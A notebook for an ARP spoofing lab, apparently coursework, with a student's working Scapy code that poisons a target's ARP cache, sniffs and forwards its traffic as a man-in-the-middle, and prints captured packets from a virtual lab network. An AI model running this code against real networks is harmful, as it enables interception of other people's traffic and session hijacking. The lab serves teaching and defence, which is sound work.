# Introduction to ARP Spoofing Lab

## What is ARP Spoofing?

ARP (Address Resolution Protocol) Spoofing is a type of cyber attack where an attacker sends falsified ARP messages over a local network. This results in the linking of the attacker's MAC address with the IP address of a legitimate computer or server on the network. Once the attacker’s MAC address is associated with an authentic IP address, the attacker can receive any data intended for that IP address. This can lead to various malicious activities such as man-in-the-middle attacks, data interception, and session hijacking.

TODO: Who are the actors of an ARP Poisson.
## Lab Objective

In this lab, we are going to implement a tool to perform ARP Spoofing. This will help you understand the mechanics of the attack and the potential security implications. You will learn how to:

- Craft and send ARP packets
- Redirect network traffic
- Analyze the impact of ARP Spoofing on network communication

By the end of this lab, you will have a practical understanding of ARP Spoofing and the importance of securing networks against such attacks.

In [5]:
#!/usr/bin/python

# Install scapy package
#pip install scapy
import scapy.all as scapy

#OR install pcap library
#pip install pypcap
import pcap

import netifaces
import threading
import time

#my own imports
# i use this to get my own mac adress rather than arp cache 
import subprocess
from sudo import sudo

hackedMachines = []
# Hardcoded interface
interface = "virbr0"


### Step 1: Setting up everything

To begin with, we need to obtain the MAC addresses of our target devices. This can be achieved using a Python library called Scapy. Scapy is a powerful tool for network manipulation and analysis, allowing us to send, sniff, and dissect network packets. By using Scapy, we can scan the network to discover devices and retrieve their MAC addresses, which are essential for further network-related operations.

It's also important that you know your IP Address

In [6]:
"""
Get the MAC address of a device on the local network given its IP address.
Args:
    ip (str): The IP address of the target device.
Returns:
    str: The MAC address of the target device.
"""

def getMacAddress(ip)->str:
    # Your code here
    # Create an ARP request packet to get the MAC address of the given IP
    arp_request = scapy.ARP(pdst=ip)
    ether_frame = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")  # Broadcast to all devices
    
    # Stack the Ether and ARP request layers together
    arp_request_broadcast = ether_frame/arp_request
    
    # Send the ARP request and capture the response
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    
    # Return the MAC address from the response
    if answered_list:
        return answered_list[0][1].src
    else:
        return None

"""
Get the IP address of the current machine from the available network interfaces.
Returns:
    str: The selected IP address of the current machine.
"""

def getOwnIpAddress() -> str:
    # Your code here
    # Get the IP address of the selected interface
    host_ip = scapy.get_if_addr(interface)
    return host_ip
    #pass
   

### Step 2: Crafting ARP Spoofing Packets

In the next step, you will create a function to craft and send ARP spoofing packets. The goal is to trick the target machines into associating the attacker's MAC address with the IP address of the target device (targetIP). This will allow the attacker to intercept the network traffic intended for the target device.

To achieve this, you will:

1. Create an ARP response packet that contains the attacker's MAC address and the IP address of the target device.
2. Send this ARP response packet to the target machines, effectively poisoning their ARP cache.

By doing this, the target machines will believe that the attacker's MAC address is the legitimate owner of the IP_Target, allowing the attacker to intercept and manipulate the network traffic.

In [7]:
"""
Sends an ARP spoofing packet to the target IP address, making it believe that the spoof IP address is associated with the attacker's MAC address.
Args:
    targetIp (str): The IP address of the target machine to be spoofed.
    spoofIp (str): The IP address that the target machine should believe is associated with the attacker's MAC address.
Returns:
    None
Raises:
    Exception: If there is an error in sending the ARP packet.
Example:
    spoof("192.168.1.5", "192.168.1.1")
"""
def spoof(targetIp, spoofIp):

    target_mac = getMacAddress(targetIp)
    # Your code here
    
    #my_mac = getMacAddress(getOwnIpAddress())
    #my_mac = "52:54:00:37:61:41"
    #getting my own mac address
    result = subprocess.run(['ifconfig', interface], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
    if result.returncode == 0:
        for line in result.stdout.splitlines():
            if 'ether' in line:
                my_mac = line.split()[1]

    # op 2 is the arp option for for arp reply
    arp_reply = scapy.ARP(op=2, hwsrc=my_mac, psrc=spoofIp, hwdst=target_mac, pdst=targetIp)

    #for debugging
    #print(f"my ip address is {getOwnIpAddress()}")
    #print(f"my mac is {my_mac}")

    # Just an idea. Try using scapy to send ARP packets to the target IP address
    # Send the packet in an infinite loop
    try:
        print(f"Sending spoofed ARP replies to {targetIp}...")
        while True:
            # we also need to make an ethernet layer for transport
            
            #eth = scapy.Ether(dst=target_mac)  # Ethernet frame with target's MAC as destination
            #packet = eth / arp_reply
            #scapy.send(packet, verbose=0)

            scapy.sendp(arp_reply, iface=interface,verbose=0)
            # now that we have sent a bad arp packet and curroupted the arp cache of target
            # we need to check we haven't already spoofed them already
            # for loop to check hacked machines
            hackedMachines.append([targetIp, target_mac])
            #print(f"the packet has been made")
            #pass
    except KeyboardInterrupt:
        print("\nStopping ARP spoofing.")
        return
    hackedMachines.append([targetIp, target_mac])
    
    #pass

### Step 3: Full Routing

In this step, you will implement full routing to intercept and forward network traffic. This is the most challenging part of the lab. You will use the `scapy` library to sniff all network traffic and identify which traffic is destined for one of the target addresses in the `hackedMachines` list.

To achieve this, you will:

1. Use `scapy` to capture all network packets.
2. Inspect each packet to determine if it is intended for one of the target addresses in the `hackedMachines` list.
3. Forward the intercepted packets to the appropriate destination.

By doing this, you will be able to fully intercept and manipulate the network traffic intended for the target devices.

Here are the steps to follow:

1. Initialize a packet sniffer.
2. For each captured packet, check if the destination IP address matches any of the target addresses in the `hackedMachines` list.
3. If a match is found, forward the packet to the intended destination.

This will allow you to perform a man-in-the-middle attack,

In [8]:
"""
Starts the packet sniffer to capture network packets.
This function initiates the sniffing process
It captures packets and processes them to forward packets to the intended destination if it's one of the hacked machines.
Returns: None
"""

def startSniffer():
    # Start sniffing packets
    # Your code here
    

    # to make sure that we are the man in the middle the original ip still needs to get the correct packet
    # that means we need to look at all the traffic in the interface and look into the destination ip
    #if that ip is one we hacked we need to forward the packet to the correct ip so it still recieves the right packet
    while True:
        try:
            # we will keep on sniffing until there is a key board interupt
            #before we can sniff the packet we need to code up a function to work with the packet correctly
            def packet_routing(packet):
                #print("we got a packet")
                # we check to see if the packets dst ip is one of our hacked ones if so we forward it from us to the original
                if packet.haslayer("IP"):
                    ip_layer = packet["IP"]

                    #print(f"got an IP packet with this ip {ip_layer.src}")
                    #print(f"here is the hacked list and what is in it {hackedMachines}")

                    #print(f"Source IP: {ip_layer.src}")
                    #print(f"Destination IP: {ip_layer.dst}")
                    # now we check the dst ip has been hacked
                    # we are making a list of keys from hackedMachines
                    for hackedip, hackedmac in hackedMachines:
                        if hackedip == ip_layer.src:
                            # this is a spoofed ip need to forward it to the orignal
                            # otherwise the spy jig is up and the target knows
                            scapy.sendp(packet, iface=interface, verbose=0)
                            #print(f"hit this part")

                            # now we are going to print out the intercepted packet casue why not

                            #print(f" the packet payload is {packet.payload}")
                            
                            #print("we reach this point")
                            #now if it is http we read the packet
                            packet.show()

                            #pass
                        
            # we are going to sniff on packet on hard coded interface to
            scapy.sniff(iface=interface, prn=packet_routing)
            #doing nothing for now
        except KeyboardInterrupt:
            print("\nStopping Sniffer")
            break
    
    #pass

In [9]:
def main():
    target_ip = "192.168.124.139"  # Replace with the target IP address
    spoof_ip = "192.168.124.2"    # Replace with the IP address to spoof

    print(f"the targest ip {target_ip} mac address is {getMacAddress(target_ip)}")
    print(f"the spoof ip {spoof_ip} mac address is {getMacAddress(spoof_ip)}")

    # Function to continuously call the spoof function
    def continuousSpoof():
        while True:
            spoof(target_ip, spoof_ip)
            #print(f"hackedMachines = {hackedMachines}")
            time.sleep(2)  # Sleep for 2 seconds before sending the next spoof packet

    # Start the spoofing thread
    spoof_thread = threading.Thread(target=continuousSpoof)
    spoof_thread.start()

    # Start the packet sniffer thread
    # This thread will run in the background and sniff packets. I do it like this in case students use a blocking solution
    sniffer_thread = threading.Thread(target=startSniffer)
    sniffer_thread.start()

# Run the main function
main()

the targest ip 192.168.124.139 mac address is None
the spoof ip 192.168.124.2 mac address is None
Sending spoofed ARP replies to 192.168.124.139...
###[ Ethernet ]###
  dst       = 52:54:00:38:fb:f2
  src       = 52:54:00:87:26:ae
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 25468
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x5d61
     src       = 192.168.124.139
     dst       = 192.168.124.2
     \options   \
###[ TCP ]###
        sport     = 37200
        dport     = http
        seq       = 2095097087
        ack       = 0
        dataofs   = 10
        reserved  = 0
        flags     = S
        window    = 32120
        chksum    = 0x7a0d
        urgptr    = 0
        options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (2008798727, 0)), ('NOP', None), ('WScale', 7)]

###[ Ethernet ]###
  dst       = 52:54:00:38:fb:f2
  src       = 52:54:00